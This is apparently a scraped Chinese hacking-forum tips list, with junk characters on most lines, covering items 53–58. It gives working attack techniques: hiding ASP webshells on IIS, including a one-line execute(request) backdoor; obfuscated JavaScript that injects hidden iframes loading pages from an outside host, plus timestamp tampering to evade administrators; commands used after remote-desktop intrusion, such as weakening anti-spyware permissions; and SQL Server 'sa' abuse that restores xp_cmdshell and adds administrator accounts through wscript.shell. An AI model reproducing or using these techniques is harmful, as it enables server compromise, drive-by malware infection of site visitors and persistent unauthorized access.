用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
; T4 I3 K' h, Z r: E6 Y4 f1 e* w/ k9 j! ]$ W7 ^) x
53、隐藏ASP后门的两种方法
# [9 Q! ^! J8 E4 u1 i1、建立非标准目录:mkdir images..\
7 v# l6 }3 Q- L拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
# T) k; F3 P0 p" p, m6 w* f% x通过web访问ASP木马:http://ip/images../news.asp?action=login9 V% `4 a" t: i
如何删除非标准目录:rmdir images..\ /s/ g+ Q$ B3 m) D' R# \
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
. q& M+ i6 ?; h' r0 Qmkdir programme.asp6 L8 D+ E- f4 [, I; e. x) |/ Y d
新建1.txt文件内容:<!--#include file=”12.jpg”-->
' J; n- k8 M% |) W `新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
+ n2 K7 O U- V0 Z4 a; X/ qattrib +H +S programme.asp* ~* t: E$ F) ]
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt0 t+ ]; h" s0 L6 q3 D. e
+ n, @3 X1 Z2 v4 M
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。% @* n& G& p& T% | d
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。6 c, g2 K& r3 D
& ^0 t/ [: d( Y4 w5 ~9 i
55、JS隐蔽挂马
! r! }3 C/ O& j7 Y6 p$ j- D) F w1.9 G; `* k+ ?; y. S& ~
var tr4c3="<iframe src=ht";1 q) \8 x' f/ X% _; u! ?+ ^8 R l. U
tr4c3 = tr4c3+"tp:/";
! t: G" Z0 j+ @% w. f1 Atr4c3 = tr4c3+"/ww";
) B* v2 j& z6 G, V1 |! `tr4c3 = tr4c3+"w.tr4";
& ?' k# x, a! N0 D( _8 w2 Etr4c3 = tr4c3+"c3.com/inc/m";
; S: a5 u) J% x% Vtr4c3 = tr4c3+"m.htm style="display:none"></i";
2 M" M. L1 L8 c* ^tr4c3 =tr4c3+"frame>'";2 L( P( @/ k; r) f/ ?9 ~# j
document.write(tr4c3);' J# n% ]2 O6 W6 V9 ?) e
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
1 i: f5 |6 s+ R9 ^- W# I( ~1 R& v- `: u+ n
2.- k, e- k+ s4 a9 n0 }+ c
转换进制,然后用EVAL执行。如
6 v) R- m6 ?0 h8 @7 n3 [# g9 [eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");0 Q0 i& |. B- B- X. k; ]
不过这个有点显眼。
& P' t8 w9 F K3.
. L5 N! F) e9 {: C( ydocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
, v9 t# A, V, j/ s& |0 c s最后一点,别忘了把文件的时间也修改下。
: ?8 P1 e* T; U- _0 I& f; C' x |/ o, |! t3 h1 `( E1 f: r7 y! M
56.3389终端入侵常用DOS命令
1 t% s7 |' d5 {- y; }7 O. jtaskkill taskkill /PID 1248 /t
0 [' J: X1 s) S* M5 A! o" ~: l. e1 e9 I+ w* L
tasklist 查进程
( o) }3 j. I* N
. |. w3 a6 S. L( G( ^) L( r0 fcacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限( b; h) c$ r2 z8 g; R& k8 k# C- a
iisreset /reboot
0 G! j) P5 a5 R8 O1 `4 Z: | ^tsshutdn /reboot /delay:1 重起服务器
/ {5 }0 r" v! v! N$ o% |5 @4 k9 L! a9 X' B% d6 `
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,1 g' _# r3 B8 X( P N3 T( R( h
' g: p, z2 d; |% ?( Z8 K! m
query user 查看当前终端用户在线情况
- e0 x* p( b( U/ ^, U% v3 I+ H
要显示有关所有会话使用的进程的信息,请键入:query process *; t8 A6 d* q$ g" K$ g$ q
6 L7 h$ U- X9 X要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:25 N6 T' c: ]+ X' ?, d; {- O
& g" D; |' @1 D9 O) E# j; x
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2/ i) J5 n/ W0 t0 j1 U+ m" |, Q
) g) K" X" h2 i5 K要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
?7 b* H4 v* E& s$ H( u- A+ S( h& m8 P8 X& o
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启2 `' Y( t, J1 U+ I d9 g. p( B
3 ~2 Q, j( V' N- C, B! a命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
. c$ B8 ~$ a1 z9 S" T3 Z* M1 H. w' \/ M: ?3 Y) x0 H
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
* {- w7 W3 |/ b- G
6 o% _7 I! O" W/ A命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机 g; ~0 F0 e/ P$ H: ^
9 n. @# B" P; ^
56、在地址栏或按Ctrl+O,输入:
* Z% \: r6 r5 U3 Q& E4 Pjavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;. X3 ?+ b. @9 w5 Z" _. a
: P" x" Y7 H! ~8 P# S
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
( y; p0 f; a- ?8 D) c0 \4 }& I: d9 y% T' B! m* {8 g
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,& x. h, N9 P! _9 k, |" Y
用net localgroup administrators是可以看到管理组下,加了$的用户的。
$ N' {) M' c( c, N" s) _/ ]0 R
7 E: X# A" F. G7 M$ E5 ?% D58、 sa弱口令相关命令- ]$ X: {- `% i
3 t4 ?- `8 E, v7 P
一.更改sa口令方法:
- `3 q, V5 s% { V用sql综合利用工具连接后,执行命令:7 t) e) c6 P$ J. Y" V# ]3 z0 f; j
exec sp_password NULL,'20001001','sa'
3 ]! P1 b7 c; d% \- O7 p- q(提示:慎用!)
! H' S* b+ D5 y" K/ g
% l" I( y6 b2 e+ m4 b/ q二.简单修补sa弱口令.: @9 v1 a' r1 L; M7 D% f5 M1 c1 S
% y/ ^6 W1 m) @" V& {
方法1:查询分离器连接后执行:6 _; O. g+ u d3 u: Z" r
if exists (select * from
% E3 X" ?8 u- I3 X% M4 X1 n7 wdbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
* _" p2 ^8 M! x- J* ?: z ZOBJECTPROPERTY(id, N'IsExtendedProc') = 1)% N( f" E% G4 @$ a
* U9 O( U; A# h2 c# E
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'+ L. K" ~+ \# m6 v& M
: ?$ m: C1 F! i$ S, i' M
GO' X/ k. B9 `" _4 n! ?; P! M$ k
r" h1 y [7 ^! ]3 g然后按F5键命令执行完毕7 f9 z% t+ J4 ^: a
5 L: I T3 C5 V" ]方法2:查询分离器连接后
2 k1 h3 D; p/ w第一步执行:use master7 E. P4 i( a0 Y4 j8 z6 w$ s& |
第二步执行:sp_dropextendedproc 'xp_cmdshell', b. [0 p( W$ M. A0 E) O% r
然后按F5键命令执行完毕
: I' B; K5 Z+ v/ q5 m* c q" c5 `3 k
/ @3 M; s d* |3 ]7 S1 H4 O1 p2 }0 r, s& i; q
三.常见情况恢复执行xp_cmdshell.
! Q) s9 Y( W q0 v) l) w
* B6 b6 p6 [! G4 ?8 E, }8 i) @; M v" O, D7 g
1 未能找到存储过程'master..xpcmdshell'.. u% ~" `/ K5 O7 n8 F) O
恢复方法:查询分离器连接后,
, P+ J; D8 t2 M第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
: J- J& Z% c! ~# m" y1 J6 V$ b第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'+ n. j- ]3 W% v% o+ I5 G
然后按F5键命令执行完毕: B, M/ \5 o0 F* H2 u) y
$ l8 _1 T' W* `2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)" S7 F: S4 }$ r
恢复方法:查询分离器连接后,
6 x9 Y: {% w+ L: ~) }( l第一步执行:sp_dropextendedproc "xp_cmdshell"+ l- |4 m& o) D0 s- v7 g
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'$ {: b+ m3 b% f: e* `/ ]+ S$ \5 [; o
然后按F5键命令执行完毕5 b, V4 x& Q- v" I/ _8 M! h0 w
A5 j b2 Z+ Q" s% ~
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。). j1 P9 t4 K+ ^/ u
恢复方法:查询分离器连接后,2 |6 U. L2 d2 M: ]8 e
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'! x6 v* m8 S& r. s! y
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' 3 x) {$ Q1 D* y4 W# I; p7 O- z
然后按F5键命令执行完毕. e" U% Q5 l6 |8 _) I# R
$ q- M' p1 b/ [
四.终极方法.
% a8 E2 m7 O, A: Y# s6 M如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
4 L- V* h* h3 ^6 H- ?/ ~查询分离器连接后,
) a) y' | ] ~) ^' L2000servser系统:8 D+ d; z9 g' l1 F$ E- @' N
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
9 q6 V) [7 K/ N# K
! @( y. f' @) Q; ~ _0 T* qdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add', b% p' N* x6 o E. O6 j
( \) I" I* n/ c3 L
xp或2003server系统:0 O8 y+ r7 b, U0 ~; Z V' \+ ?8 r
- Q. j- `+ L [ |( b# [6 ^declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'1 n# f r7 p9 g( u" @
9 i1 r8 Q- f- _
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'6 b, [4 w9 x3 ?8 I( W9 z# m Q, g
|